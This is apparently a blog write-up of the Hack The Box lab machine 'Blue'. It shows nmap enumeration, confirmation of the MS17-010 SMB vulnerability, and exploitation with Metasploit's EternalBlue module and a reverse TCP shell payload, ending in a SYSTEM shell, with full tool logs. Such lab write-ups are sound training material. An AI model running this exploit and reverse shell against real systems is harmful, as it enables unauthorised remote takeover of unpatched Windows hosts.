Blue – Hackthebox.eu

Being noted as one of the easiest boxes on Hackthebox, I never got around to doing it, since it was already archived when I first joined. It just re-entered circulation as a retired box, I still can get a crack at this one. Lets have a look!

Enumeration

I fired up trusty nmap to get an understanding of the services running on the box:

map -sC -sV -oA initial 10.10.10.40
[sudo] password for wieger:
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-04 18:27 UTC
Nmap scan report for 10.10.10.40
Host is up (0.026s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -20m54s, deviation: 34m37s, median: -55s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2018-07-04T19:27:29+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required

We see SMB running on this machine. Given that the name of the boxes are often hints on how to pwn the machine, this instantly made me think of EternalBlue, the now famous exploit that was part of the EQUATION GROUP leaks released by The Shadow Brokers in 2017.¬† Let’s see how we can use nmap to find if the machine is vulnerable. For this, I use the

--script safe

argument which fires all scripts at the machine that are classified as safe by nmap

Nmap 7.70 scan initiated Wed Jul 4 18:34:49 2018 as: nmap --script safe -oA safescan 10.10.10.40
Pre-scan script results:
| broadcast-listener:
| ether
| udp
| DHCP6
| ip fqdn
| fe80::185d:f891:e4f7:9751 WIN-IGHS2VQIQ6R.izokvanta.domain
| fe80::a038:3bbf:9a10:ac20 WIN-RMHVPNAC33Q
| fe80::a9c8:85d5:daf:4c0c WIN-HSQ1RC7LI04
|_ fe80::64c8:df41:32e2:e464 servWin12.citicentre.ru
|_broadcast-wpad-discover: Failed to retrieve wpad.dat (http://wpad.com/wpad.dat) from server
|_eap-info: please specify an interface with -e
| lltd-discovery:
| 5.79.113.56
| Hostname: WIN-PFJH6S97DIC
| Mac: 06:1e:58:00:1f:89 (Unknown)
| IPv6: fe80::e1b3:d3c6:70dc:3457
| 5.79.113.57
| Hostname: WIN-T1H804M6I84
| Mac: 06:bc:0a:00:1f:8a (Unknown)
| IPv6: 2001:1af8:4700:a134:7d53:3ce3:6ac6:16ab
|_ Use the newtargets script-arg to add the results as targets
| targets-asn:
|_ targets-asn.asn is a mandatory parameter
Nmap scan report for 10.10.10.40
Host is up (0.031s latency).
Not shown: 991 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown

Host script results:
|_clock-skew: mean: -20m53s, deviation: 34m36s, median: -55s
|_fcrdns: FAIL (No PTR record)
|_ipidseq: Unknown
| msrpc-enum:
|
| uuid: d95afe70-a6d5-4259-822e-2c84da1ddb0d
| tcp_port: 49152
| ip_addr: 0.0.0.0
|
| ncalrpc: LRPC-8f4e4bf86bdde8982b
| uuid: 906b0ce0-c70b-1067-b317-00dd010662da
|
| ncalrpc: LRPC-8f4e4bf86bdde8982b
| uuid: 906b0ce0-c70b-1067-b317-00dd010662da
|_smb-mbenum: Not a master or backup browser
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2018-07-04T19:34:41+01:00
| smb-protocols:
| dialects:
| NT LM 0.12 (SMBv1) [dangerous, but default]
| 2.02
|_ 2.10
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| smb2-capabilities:
| 2.02:
| Distributed File System
| 2.10:
| Distributed File System
| Leasing
|_ Multi-credit operations
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2018-07-04 18:34:40
|_ start_date: 2018-07-02 00:56:44
| unusual-port:
|_ WARNING: this script depends on Nmap's service/version detection (-sV)

Post-scan script results:
| reverse-index:
| 135/tcp: 10.10.10.40
| 139/tcp: 10.10.10.40
| 445/tcp: 10.10.10.40
| 49152/tcp: 10.10.10.40
| 49153/tcp: 10.10.10.40
| 49154/tcp: 10.10.10.40
| 49155/tcp: 10.10.10.40
| 49156/tcp: 10.10.10.40
|_ 49157/tcp: 10.10.10.40

I trimmed the log somewhat, but there it states that the service is vulnerable for exploit linked to ms17-010. We can achieve the same thing with Metasploit and the auxiliary/scanner/smb/smb_msf17_010 scanner:

msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)

Exploitation

I used the exploit/windows/smb/ms17_010_eternalblue module of Metasploit for this. I set the RHOST to the Blue machine IP, set LHOST to tun0 (my Hackthebox VPN interface) and payload /windows/x64/shell/reverse_tcp. It fails a couple of times, but in the end I get a shell.

[*] Started reverse TCP handler on 10.10.14.28:4444
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.

*] Sending stage (336 bytes) to 10.10.10.40
[*] Command shell session 1 opened (10.10.14.28:4444 -> 10.10.10.40:49158) at 2018-07-04 22:08:25 +0200
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Privilege escalation

None needed:

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Go to

C:\Users\haris\Desktop

for the user key and

C:\Users\Administrator\Desktop

for the root key.